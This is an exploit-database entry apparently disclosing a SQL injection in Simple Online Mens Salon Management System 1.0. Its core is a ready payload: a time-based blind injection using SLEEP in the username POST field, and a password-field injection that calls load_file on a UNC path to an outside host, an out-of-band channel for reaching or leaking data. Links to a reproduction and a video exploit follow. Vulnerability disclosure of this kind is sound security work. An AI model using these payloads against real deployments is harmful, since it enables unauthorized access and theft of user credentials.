Simple Online Mens Salon Management System 1.0 SQL Injection Vulnerability

2021-12-06T00:00:00
ID 1337DAY-ID-37101
Type zdt
Reporter nu11secur1ty
Modified 2021-12-06T00:00:00

Description

                                        
                                            Simple Online Mens Salon Management System 1.0 SQL Injection Vulnerability

## [MSMS](https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html)

## [Vendor](https://www.sourcecodester.com/users/tips23)

![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/MSMS/docs/Screenshot%202021-12-04%20175708.png)

## Description
The `password` parameter on MSMS 1.0 appears to be vulnerable to SQL
injection attacks. The predictive tests of this application interacted
with that domain, indicating that the injected SQL query was executed.
The attacker can retrieve all authentication and
information about the users of this system.

## Payload

```mysql
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=hacked' AND (SELECT 5469 FROM
(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select
load_file('\\\\525cg9hmf4ujg32elolcrk29s0yumlq9hc54svgk.nu11secur1typenetrationtestingengineer.net\\maq'))+'
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/MSMS)

## Proof and Exploit:
[href](https://streamable.com/fvwqq2)